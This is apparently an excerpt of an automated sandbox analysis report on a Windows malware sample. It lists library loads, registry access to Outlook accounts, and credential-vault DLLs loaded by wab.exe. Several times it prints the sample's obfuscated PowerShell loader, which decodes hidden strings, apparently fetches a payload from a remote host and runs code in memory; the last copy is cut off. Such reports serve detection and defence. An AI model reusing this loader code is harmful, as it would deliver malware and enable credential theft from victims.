Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: version.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: pstorec.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: vaultcli.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: pstorec.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts Jump to behavior

Data Obfuscation

barindex
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: .Run("powershell "cls;write 'Unblessed Assimilerings silverrod Cirsith200 Bespake Lucres Galvanography Medansvaret Trom", "0")
Source: Yara match File source: 0000000A.00000002.3365707907.0000000003B66000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2523450659.00000000098C6000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2523348220.0000000008E50000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2647803463.000002849CCDF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2517695636.00000000063C4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Trommesalsmaleri)$global:Journalnummeret = [System.Text.Encoding]::ASCII.GetString($Spuming)$global:Gennemsigtigt=$Journalnummeret.substring($Lysimeters,$Descantist115)<#beagler Mids
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((bunkevist $Camperingers $Premoral), (Enveloping @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Hellebardists = [AppDomain]::CurrentDomain.GetAssemblies()$
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Konfedereret)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Peroxy, $false).DefineType($Telecourse, $Aca
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Trommesalsmaleri)$global:Journalnummeret = [System.Text.Encoding]::ASCII.GetString($Spuming)$global:Gennemsigtigt=$Journalnummeret.substring($Lysimeters,$Descantist115)<#beagler Mids
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Unblessed Assimilerings silverrod Cirsith200 Bespake Lucres Galvanography Medansvaret Trommesalsmaleri badutspringene Batwoman Journalnummeret Dobbeltkvartet Clover Coffeeroom calamiform Urophobia Kloakeringsomraaderne Electroculture Euphemist Bjergmassivernes Uhjlpeligste Stalinismens Telekommunikationens Unblessed Assimilerings silverrod Cirsith200 Bespake Lucres Galvanography Medansvaret Trommesalsmaleri badutspringene Batwoman Journalnummeret Dobbeltkvartet Clover Coffeeroom calamiform Urophobia Kloakeringsomraaderne Electroculture Euphemist Bjergmassivernes Uhjlpeligste Stalinismens Telekommunikationens';If (${host}.CurrentCulture) {$Fightet++;}Function fyrstendmme($aldersforskellens){$Breddesekunder=$aldersforskellens.Length-$Fightet;$Energi='SUBsTRI';$Energi+='ng';For( $standsforskellenes=7;$standsforskellenes -lt $Breddesekunder;$standsforskellenes+=8){$Unblessed+=$aldersforskellens.$Energi.Invoke( $standsforskellenes, $Fightet);}$Unblessed;}function Illish($Phagedaena){ . ($Triangularize) ($Phagedaena);}$Opholdsstuernes=fyrstendmme 'Ove,logMP sternoStudentzB,throdiBasommal,ovangslCopywria rbefol/Aphidic5Blokskr.Overvaa0Duarchy Genrefo(Reser,eWDistrusiOsm.regnSpacersdcert,fioPassiarwInterjesPeckedi NydeligNMontr cTAnticle Medinde1 Overcr0elastom.Un.erfo0Renounc; Topot. Bia ricWTrimniniJetsrunnLsdelfl6Hovmodi4forrykk;Nautica stra hsxSne ker6Cohea.t4 theop.; Prster SelvcerEntase v Undres:undecor1Fejlber2Phyllos1Martial.Konkurr0Fdevand)Yawlers AbioloGFemkroneVejrm.lckommandkBemyndio Ti skr/Vaaben.2 Relati0 Fanwr 1Flugtni0Gerning0Analyse1Udmanvr0Sidetal1Lin.les Appo,ehFCyk lbaiSamekhurcalioloeMoa lesfRester o,estselxUdsp ng/ Aandev1 asiali2Tubercl1,eperso. drydde0 Fogf,u ';$Sorteringens=fyrstendmme 'PaakrveU Antedas Sjaelaevulkankr baga e-tjenestA.nderprgMemoryleTelak cn ndtjentDesinfi ';$Bespake=fyrstendmme 'Arthrozh Lat,setLaveslat GenbrupUdnvnel:Donnish/Telefon/Gambesm1Esquire0Aktiesm3Nonrepa. Pushie2Spag um3 Entome7Simonio. digame8 cul ee6 Mistan. Ba oni2Sawneba4porella7Rodesbl/ ClenchF BoatsirOpprioreGraagaamAndenklmBetonk,eSexol glBoghvediAf.rftegAdipsybs calceit GeodifeUlcerog.ElectroxApp,ehesAf,rydsnholden ';$Deutoxide=fyrstendmme 'Valgets>Bakteri ';$Triangularize=fyrstendmme 'UdfyldniMikalaseUforkorxReprodu ';$Doozie='Medansvaret';$Bombestoppets = fyrstendmme ' ,ulbrieUl,triccUngr.sphForretnoAfrett. Pa.gene%Becifreainex,repRuelsenpCostaladCarabaoaalk,nettPja,tesaFleshbr%tidtag.\ NonmitDSystemko Lnra,mbEkstraibScraggleBudgettlparadeftCraniomrSrsynetuThiokoldClericieSecondin Do torsHamalds1Avgusta4Hildebo0A bejds.hugtandASkoleinfUnreal.fSerpent trillin&Hilsene&B ngtow P.cocureInterfrctubi,olhArtiumsoc onebr .ustulatunmetap ';Illish (fyrstendmme ' Pixm.p$GastroegTypot kl etreado Trachob Pse.doa hrynidl La.dsd:ForsnknDMimicaleAndalusb mirska,osmolat HalefieStandtirDidrach= Nati.n(Genaabnc Derre.mSteer
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Unblessed Assimilerings silverrod Cirsith200 Bespake Lucres Galvanography Medansvaret Trommesalsmaleri badutspringene Batwoman Journalnummeret Dobbeltkvartet Clover Coffeeroom calamiform Urophobia Kloakeringsomraaderne Electroculture Euphemist Bjergmassivernes Uhjlpeligste Stalinismens Telekommunikationens Unblessed Assimilerings silverrod Cirsith200 Bespake Lucres Galvanography Medansvaret Trommesalsmaleri badutspringene Batwoman Journalnummeret Dobbeltkvartet Clover Coffeeroom calamiform Urophobia Kloakeringsomraaderne Electroculture Euphemist Bjergmassivernes Uhjlpeligste Stalinismens Telekommunikationens';If (${host}.CurrentCulture) {$Fightet++;}Function fyrstendmme($aldersforskellens){$Breddesekunder=$aldersforskellens.Length-$Fightet;$Energi='SUBsTRI';$Energi+='ng';For( $standsforskellenes=7;$standsforskellenes -lt $Breddesekunder;$standsforskellenes+=8){$Unblessed+=$aldersforskellens.$Energi.Invoke( $standsforskellenes, $Fightet);}$Unblessed;}function Illish($Phagedaena){ . ($Triangularize) ($Phagedaena);}$Opholdsstuernes=fyrstendmme 'Ove,logMP sternoStudentzB,throdiBasommal,ovangslCopywria rbefol/Aphidic5Blokskr.Overvaa0Duarchy Genrefo(Reser,eWDistrusiOsm.regnSpacersdcert,fioPassiarwInterjesPeckedi NydeligNMontr cTAnticle Medinde1 Overcr0elastom.Un.erfo0Renounc; Topot. Bia ricWTrimniniJetsrunnLsdelfl6Hovmodi4forrykk;Nautica stra hsxSne ker6Cohea.t4 theop.; Prster SelvcerEntase v Undres:undecor1Fejlber2Phyllos1Martial.Konkurr0Fdevand)Yawlers AbioloGFemkroneVejrm.lckommandkBemyndio Ti skr/Vaaben.2 Relati0 Fanwr 1Flugtni0Gerning0Analyse1Udmanvr0Sidetal1Lin.les Appo,ehFCyk lbaiSamekhurcalioloeMoa lesfRester o,estselxUdsp ng/ Aandev1 asiali2Tubercl1,eperso. drydde0 Fogf,u ';$Sorteringens=fyrstendmme 'PaakrveU Antedas Sjaelaevulkankr baga e-tjenestA.nderprgMemoryleTelak cn ndtjentDesinfi ';$Bespake=fyrstendmme 'Arthrozh Lat,setLaveslat GenbrupUdnvnel:Donnish/Telefon/Gambesm1Esquire0Aktiesm3Nonrepa. Pushie2Spag um3 Entome7Simonio. digame8 cul ee6 Mistan. Ba oni2Sawneba4porella7Rodesbl/ ClenchF BoatsirOpprioreGraagaamAndenklmBetonk,eSexol glBoghvediAf.rftegAdipsybs calceit GeodifeUlcerog.ElectroxApp,ehesAf,rydsnholden ';$Deutoxide=fyrstendmme 'Valgets>Bakteri ';$Triangularize=fyrstendmme 'UdfyldniMikalaseUforkorxReprodu ';$Doozie='Medansvaret';$Bombestoppets = fyrstendmme ' ,ulbrieUl,triccUngr.sphForretnoAfrett. Pa.gene%Becifreainex,repRuelsenpCostaladCarabaoaalk,nettPja,tesaFleshbr%tidtag.\ NonmitDSystemko Lnra,mbEkstraibScraggleBudgettlparadeftCraniomrSrsynetuThiokoldClericieSecondin Do torsHamalds1Avgusta4Hildebo0A bejds.hugtandASkoleinfUnreal.fSerpent trillin&Hilsene&B ngtow P.cocureInterfrctubi,olhArtiumsoc onebr .ustulatunmetap ';Illish (fyrstendmme ' Pixm.p$GastroegTypot kl etreado Trachob Pse.doa hrynidl La.dsd:ForsnknDMimicaleAndalusb mirska,osmolat HalefieStandtirDidrach= Nati.n(Genaabnc Derre.mSteer
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Unblessed Assimilerings silverrod Cirsith200 Bespake Lucres Galvanography Medansvaret Trommesalsmaleri badutspringene Batwoman Journalnummeret Dobbeltkvartet Clover Coffeeroom calamiform Urophobia Kloakeringsomraaderne Electroculture Euphemist Bjergmassivernes Uhjlpeligste Stalinismens Telekommunikationens Unblessed Assimilerings silverrod Cirsith200 Bespake Lucres Galvanography Medansvaret Trommesalsmaleri badutspringene Batwoman Journalnummeret Dobbeltkvartet Clover Coffeeroom calamiform Urophobia Kloakeringsomraaderne Electroculture Euphemist Bjergmassivernes Uhjlpeligste Stalinismens Telekommunikationens';If (${host}.CurrentCulture) {$Fightet++;}Function fyrstendmme($aldersforskellens){$Breddesekunder=$aldersforskellens.Length-$Fightet;$Energi='SUBsTRI';$Energi+='ng';For( $standsforskellenes=7;$standsforskellenes -lt $Breddesekunder;$standsforskellenes+=8){$Unblessed+=$aldersforskellens.$Energi.Invoke( $standsforskellenes, $Fightet);}$Unblessed;}function Illish($Phagedaena){ . ($Triangularize) ($Phagedaena);}$Opholdsstuernes=fyrstendmme 'Ove,logMP sternoStudentzB,throdiBasommal,ovangslCopywria rbefol/Aphidic5Blokskr.Overvaa0Duarchy Genrefo(Reser,eWDistrusiOsm.regnSpacersdcert,fioPassiarwInterjesPeckedi NydeligNMontr cTAnticle Medinde1 Overcr0elastom.Un.erfo0Renounc; Topot. Bia ricWTrimniniJetsrunnLsdelfl6Hovmodi4forrykk;Nautica stra hsxSne ker6Cohea.t4 theop.; Prster SelvcerEntase v Undres:undecor1Fejlber2Phyllos1Martial.Konkurr0Fdevand)Yawlers AbioloGFemkroneVejrm.lckommandkBemyndio Ti skr/Vaaben.2 Relati0 Fanwr 1Flugtni0Gerning0Analyse1Udmanvr0Sidetal1Lin.les Appo,ehFCyk lbaiSamekhurcalioloeMoa lesfRester o,estselxUdsp ng/ Aandev1 asiali2Tubercl1,eperso. drydde0 Fogf,u ';$Sorteringens=fyrstendmme 'PaakrveU Antedas Sjaelaevulkankr baga e-tjenestA.nderprgMemoryleTelak cn ndtjentDesinfi ';$Bespake=fyrstendmme 'Arthrozh Lat,setLaveslat GenbrupUdnvnel:Donnish/Telefon/Gambesm1Esquire0Aktiesm3Nonrepa. Pushie2Spag um3 Entome7Simonio. digame8 cul ee6 Mistan. Ba oni2Sawneba4porella7Rodesbl/ ClenchF BoatsirOpprioreGraagaamAndenklmBetonk,eSexol glBoghvediAf.rftegAdipsybs calceit GeodifeUlcerog.ElectroxApp,ehesAf,rydsnholden ';$Deutoxide=fyrstendmme 'Valgets>Bakteri ';$Triangularize=fyrstendmme 'UdfyldniMikalaseUforkorxReprodu ';$Doozie='Medansvaret';$Bombestoppets = fyrstendmme ' ,ulbrieUl,triccUngr.sphForretnoAfrett. Pa.gene%Becifreainex,repRuelsenpCostaladCarabaoaalk,nettPja,tesaFleshbr%tidtag.\ NonmitDSystemko Lnra,mbEkstraibScraggleBudgettlparadeftCraniomrSrsynetuThiokoldClericieSecondin Do torsHamalds1Avgusta4Hildebo0A bejds.hugtandASkoleinfUnreal.fSerpent trillin&Hilsene&B ngtow P.cocureInterfrctubi,olhArtiumsoc onebr .ustulatunmetap ';Illish (fyrstendmme ' Pixm.p$GastroegTypot kl etreado Trachob Pse.doa hrynidl La.dsd:ForsnknDMimicaleAndalusb mirska,osmolat HalefieStandtirDidrach= Nati.n(Genaabnc Derre.mSteer Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Unblessed Assimilerings silverrod Cirsith200 Bespake Lucres Galvanography Medansvaret Trommesalsmaleri badutspringene Batwoman Journalnummeret Dobbeltkvartet Clover Coffeeroom calamiform Urophobia Kloakeringsomraaderne Electroculture Euphemist Bjergmassivernes Uhjlpeligste Stalinismens Telekommunikationens Unblessed Assimilerings silverrod Cirsith200 Bespake Lucres Galvanography Medansvaret Trommesalsmaleri badutspringene Batwoman Journalnummeret Dobbeltkvartet Clover Coffeeroom calamiform Urophobia Kloakeringsomraaderne Electroculture Euphemist Bjergmassivernes Uhjlpeligste Stalinismens Telekommunikationens';If (${host}.CurrentCulture) {$Fightet++;}Function fyrstendmme($aldersforskellens){$Breddesekunder=$aldersforskellens.Length-$Fightet;$Energi='SUBsTRI';$Energi+='ng';For( $standsforskellenes=7;$standsforskellenes -lt $Breddesekunder;$standsforskellenes+=8){$Unblessed+=$aldersforskellens.$Energi.Invoke( $standsforskellenes, $Fightet);}$Unblessed;}function Illish($Phagedaena){ . ($Triangularize) ($Phagedaena);}$Opholdsstuernes=fyrstendmme 'Ove,logMP sternoStudentzB,throdiBasommal,ovangslCopywria rbefol/Aphidic5Blokskr.Overvaa0Duarchy Genrefo(Reser,eWDistrusiOsm.regnSpacersdcert,fioPassiarwInterjesPeckedi NydeligNMontr cTAnticle Medinde1 Overcr0elastom.Un.erfo0Renounc; Topot. Bia ricWTrimniniJetsrunnLsdelfl6Hovmodi4forrykk;Nautica stra hsxSne ker6Cohea.t4 theop.; Prster SelvcerEntase v Undres:undecor1Fejlber2Phyllos1Martial.Konkurr0Fdevand)Yawlers AbioloGFemkroneVejrm.lckommandkBemyndio Ti skr/Vaaben.2 Relati0 Fanwr 1Flugtni0Gerning0Analyse1Udmanvr0Sidetal1Lin.les Appo,ehFCyk lbaiSamekhurcalioloeMoa lesfRester o,estselxUdsp ng/ Aandev1 asiali2Tubercl1,eperso. drydde0 Fogf,u ';$Sorteringens=fyrstendmme 'PaakrveU Antedas Sjaelaevulkankr baga e-tjenestA.nderprgMemoryleTelak cn ndtjentDesinfi ';$Bespake=fyrstendmme 'Arthrozh Lat,setLaveslat GenbrupUdnvnel:Donnish/Telefon/Gambesm1Esquire0Aktiesm3Nonrepa. Pushie2Spag um3 Entome7Simonio. digame8 cul ee6 Mistan. Ba oni2Sawneba4porella7Rodesbl/ ClenchF BoatsirOpprioreGraagaamAndenklmBetonk,eSexol glBoghvediAf.rftegAdipsybs calceit GeodifeUlcerog.ElectroxApp,ehesAf,rydsnholden ';$Deutoxide=fyrstendmme 'Valgets>Bakteri ';$Triangularize=fyrstendmme 'UdfyldniMikalaseUforkorxReprodu ';$Doozie='Medansvaret';$Bombestoppets = fyrstendmme ' ,ulbrieUl,triccUngr.sphForretnoAfrett. Pa.gene%Becifreainex,repRuelsenpCostaladCarabaoaalk,nettPja,tesaFleshbr%tidtag.\ NonmitDSystemko Lnra,mbEkstraibScraggleBudgettlparadeftCraniomrSrsynetuThiokoldClericieSecondin Do torsHamalds1Avgusta4Hildebo0A bejds.hugtandASkoleinfUnreal.fSerpent trillin&Hilsene&B ngtow P.cocureInterfrctubi,olhArtiumsoc onebr .ustulatunmetap ';Illish (fyrstendmme ' Pixm.p$GastroegTypot kl etreado Trachob Pse.doa hrynidl La.dsd:ForsnknDMimicaleAndalusb mirska,osmolat HalefieStandtirDidrach= Nati.n(Genaabnc Derre.mSteer Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Unblessed Assimilerings silverrod Cirsith200 Bespake Lucres Galvanography Medansvaret Trommesalsmaleri badutspringene Batwoman Journalnummeret Dobbeltkvartet Clover Coffeeroom calamiform Urophobia Kloakeringsomraaderne Electroculture Euphemist Bjergmassivernes Uhjlpeligste Stalinismens Telekommunikationens Unblessed Assimilerings silverrod Cirsith200 Bespake Lucres Galvanography Medansvaret Trommesalsmaleri badutspringene Batwoman Journalnummeret Dobbeltkvartet Clover Coffeeroom calamiform Urophobia Kloakeringsomraaderne Electroculture Euphemist Bjergmassivernes Uhjlpeligste Stalinismens Telekommunikationens';If (${host}.CurrentCulture) {$Fightet++;}Function fyrstendmme($aldersforskellens){$Breddesekunder=$aldersforskellens.Length-$Fightet;$Energi='SUBsTRI';$Energi+='ng';For( $standsforskellenes=7;$standsforskellenes -lt $Breddesekunder;$standsforskellenes+=8){$Unblessed+=$aldersforskellens.$Energi.Invoke( $standsforskellenes, $Fightet);}$Unblessed;}function Illish($Phagedaena){ . ($Triangularize) ($Phagedaena);}$Opholdsstuernes=fyrstendmme 'Ove,logMP sternoStudentzB,throdiBasommal,ovangslCopywria rbefol/Aphidic5Blokskr.Overvaa0Duarchy Genrefo(Reser,eWDistrusiOsm.regnSpacersdcert,fioPassiarwInterjesPeckedi NydeligNMontr cTAnticle Medinde1 Overcr0elastom.Un.erfo0Renounc; Topot. Bia ricWTrimniniJetsrunnLsdelfl6Hovmodi4forrykk;Nautica stra hsxSne ker6Cohea.t4 theop.; Prster SelvcerEntase v Undres:undecor1Fejlber2Phyllos1Martial.Konkurr0Fdevand)Yawlers 